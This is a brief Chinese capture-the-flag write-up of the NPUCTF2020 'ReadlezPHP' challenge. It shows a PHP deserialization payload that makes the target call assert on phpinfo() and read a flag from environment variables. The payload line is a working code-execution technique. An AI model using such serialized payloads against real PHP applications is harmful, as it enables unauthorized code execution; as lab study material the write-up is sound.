[NPUCTF2020]ReadlezPHP

这道题打开看到一个鬼(bushi)和一个报时台,看代码发现是一个time.php

img

访问一下,显示了时间,传一个source参数,得到了源代码

img

看来是一个反序列化题,从源码来看,突破点应该在这

img

先用phpinfo看看可不可以

img

payload:?data=O:8:”HelloPhp”:2:{s:1:”a”;s:9:”phpinfo()”;s:1:”b”;s:6:”assert”;}

然后拿到了flag(真在环境变量里啊)

因为做了,但没想到有点简单,所以wp放这里了